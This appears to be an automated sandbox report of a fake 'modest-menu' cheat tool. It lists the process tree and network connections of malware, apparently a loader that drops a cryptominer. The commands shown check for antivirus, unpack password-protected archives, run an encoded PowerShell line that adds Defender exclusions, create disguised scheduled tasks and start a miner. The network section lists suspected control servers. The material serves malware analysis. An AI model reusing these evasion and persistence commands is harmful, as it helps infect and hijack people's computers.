"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\modest8\Read.txt

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p2201249071693326612168609430 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAEcAbQBxAFIAZQBwAGMASwBNAEQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAEQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBaAEcAMwA3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFIAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAEcAbQBxAFIAZQBwAGMASwBNAEQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAEQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBaAEcAMwA3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFIAQwAjAD4A"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk2882" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk2882" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcad0dcc40,0x7ffcad0dcc4c,0x7ffcad0dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1712,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1928 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1780,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3120 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3620,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4384 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4728,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4736 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4352,i,16321711913786594504,2337613977759887727,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4812 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcad0dcc40,0x7ffcad0dcc4c,0x7ffcad0dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=1864 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1796,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=2100 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=1576 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3536,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4476 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4756 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4620,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3700 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5100,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5084 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3460,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4732 /prefetch:8

C:\Users\Admin\Downloads\dnSpy-net-win64\dnSpy.exe

"C:\Users\Admin\Downloads\dnSpy-net-win64\dnSpy.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" C:\Users\Admin\Desktop\modest8\modest-menu.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5119F48E14DC1A0483324D7C6CD17785 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=140E44D16C46F15B4ED298EEC2390258 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=140E44D16C46F15B4ED298EEC2390258 --renderer-client-id=2 
--mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A6703FFB162F90609360DFE179BD9490 --mojo-platform-channel-handle=2336 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=11176BE346531F974EB594CD09AE1A05 --mojo-platform-channel-handle=1944 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5252,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5444,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5420 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5588,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5620 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5572,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5748,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5216,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5012,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5348 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5248,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5744 /prefetch:8

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5360,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=3692 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5320,i,9545986191804998047,63922681825182678,262144 --variations-seed-version=20240712-130137.211000 --mojo-platform-channel-handle=5440 /prefetch:1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\ProgramData\Dllhost\dllhost.exe

C:\ProgramData\Dllhost\dllhost.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\ProgramData\Dllhost\winlogson.exe

C:\ProgramData\Dllhost\winlogson.exe -c config.json

Network

Country Destination Domain Proto
GB 216.58.201.99:445 clientservices.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 216.58.212.234:443 content-autofill.googleapis.com tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:80 7-zip.org tcp
DE 49.12.202.237:80 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:443 7-zip.org tcp
DE 49.12.202.237:80 7-zip.org tcp
GB 20.26.156.215:443 github.com tcp
GB 104.86.110.99:443 tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
AU 40.79.173.40:443 browser.pipe.aria.microsoft.com tcp
GB 142.250.180.4:443 www.google.com udp
US 150.171.27.254:443 ax-ring.msedge.net tcp
US 13.107.138.254:443 spo-ring.msedge.net tcp
RU 85.28.47.132:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 104.20.3.235:443 pastebin.com tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 147.45.47.81:80 147.45.47.81 tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.200.14:443 clients2.google.com udp
RU 85.28.47.132:80 tcp
RU 85.28.47.132:80 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 104.26.13.31:443 api.ip.sb tcp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
